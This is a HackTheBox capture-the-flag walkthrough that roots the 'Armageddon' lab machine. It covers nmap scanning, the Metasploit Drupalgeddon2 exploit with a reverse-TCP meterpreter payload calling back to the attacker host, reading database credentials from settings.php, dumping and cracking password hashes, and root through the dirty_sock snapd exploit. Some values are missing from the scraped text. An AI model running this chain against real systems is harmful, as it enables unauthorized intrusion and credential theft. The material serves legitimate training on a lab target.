Armageddon HackTheBox WalkThrough
This is Armageddon HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted
Armageddon HackTheBox machine. Before starting let us know something about this machine. It is a
Linux box with IP address
10.10.10.233 and difficulty
easy assigned by its maker.
First of all connect your PC with
HackTheBox VPN and make sure your connectivity with
Armageddon machine by pinging its IP 10.10.10.233. If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in
banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning also. I have used
nmap for this task and the result is given below:-
$ sudo nmap -sC -sV -sT -oA nmap/Armageddon 10.10.10.233
Nmap found ports
80 as open.
OpenSSH 7.4 is running on port
Apache2 web server is running on port
80. Also, nmap script
http-generator revealed that the website hosted on this web server is created using
Drupal 7 CMS. Drupal is an Open Source CMS which gives us facility to create attractive website just like WordPress CMS. Ongoing to the URL http://10.10.10.233 found Drupal Login page.
I wanted to find the exact version of this CMS so that I can search for available exploits. Ongoing to the URL http://10.10.10.233/robots.txt found
/Changelog.txt file. Changelog.txt file usually includes records of changes such as bug fixes, new features, etc., added to the application. Ongoing to http://10.10.10.233/CHANGELOG.txt found that installed version of Drupal is
7.56 which was released on 21st of June 2017.
Tip: Whenever you find that any Open Source CMS is being used simply go to their GitHub repository and check their directory structure and then check for the same file in your vulnerable website. Don’t directory bruteforce on the vulnerable site because in Open Source CMS everything is publicly available.
Let us search for available exploits using
Searching for Drupal Exploits
$ searchsploit drupal 7.56
Searchsploit found many number of exploits. My first focus was on
Metasploit because it makes our work a lot easier. When I searched Drupal exploit in metasploit it found many exploits.
Drupalgeddon was my focus because its suffix matches with this machine name. After some trial and error I got the exploit
exploit/unix/webapp/drupal_drupalgeddon2 worked and gave me shell. So let us get user shell.
Getting User Shell
msf6 > search drupal
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.10.10.233
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set PAYLOAD php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 10.10.14.10
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
meterpreter > sysinfo
We have successfully got user shell. Let us upgrade the shell to fully qualified Linux shell so that we can proceed for higher level task.
meterpreter > shell
bash-4.2$ export TERM=xterm
$ python3 -c 'import pty; pty.spawn("/bin
/bash")' won’t work.
After some initial enumeration found some database login credential inside file
$ cat /var/www/html/sites/default/settings.php
The credentials are:
My next step is to find whether any database server is running locally so that I can use this credentials to dump other user’s login credential.
$ netstat -punta
$ netstat command found that port
3306 is listening locally. So let us login into MySQL server and see what is present there.
logging into mysql & dumping user creds
Since we don’t have a fully qualified Linux shell that why we can’t spawn MySQL prompt. We have to run SQL command in one line. For more info on using MySQL command in one line check this article.
$ mysql -u'drupaluser' -p'[email protected]*m23gBVj' -e 'show databases;'
$ mysql -u'drupaluser' -p'[email protected]*m23gBVj' -D drupal -e 'show tables;'
$ mysql -u'drupaluser' -p'[email protected]*m23gBVj' -D drupal -e 'select name,pass from users;'
We got hash of user
brucetherealadmin which is
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt. Let us identify the hash so that we can go for cracking using
$ hashcat (an offline password cracker).
Hash identifier found its algorithm to be of Drupal7. Let us crack it.
$ hashcat -a 3 -m 7900 '$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt' /usr/share/wordlists/rockyou.txt
$ hashcat -a 3 -m 7900 '$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt' –show
Hashcat found password of
brucetherealadmin to be
booboo. Let us check whether brucetherealadmin user exist or not.
$ cat /etc/passwd | grep /bash
It exist and it also has bash shell. Let us SSH into it using $ssh (OpenSSH remote login client) command.
SSH into user Brucetherealadmin
$ ssh [email protected]
We are now logged in as user brucetherealadmin. Let us capture user flag.
Capture User Flag
$ cat user.txt
To escalate the privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation.
Finding PrivEsc Vector
$ sudo -l
$ sudo -l command revealed that user brucetherealadmin can run
(root) NOPASSWD: /usr/bin/snap install * on armageddon as root. In other words, we can say that user brucetherealadmin can install any snap package in armageddon. You can think snap package like a docker package. Snap packages are complete in itself along with their dependencies and run in sandboxed environment in different Linux distributions. For more info check this video on YouTube.
$ snap version command revealed the installed version of
snapd to be
After some googling found a local privilege escalation exploit for
snapd 2.47. For more details on how this exploit work and about vulnerability check this link. When I tried to get root shell using this exploit I would easily got root. So here our potential PrivEsc vector is Privilege Escalation by
Exploiting Known Vulnerability in Software and the software is
To get root shell do the following.
Getting Root Shell
$ cd /dev/shm/
$ sudo /usr/bin/snap install --devmode exploit.snap
$ su dirty_sock
$ sudo -i
# whoami && id
We are root now. Let us capture root flag.
Capture Root Flag
$ cat root.txt
This was how I rooted to Armageddon HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. For any query and walkthrough related doubt feel free to write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/.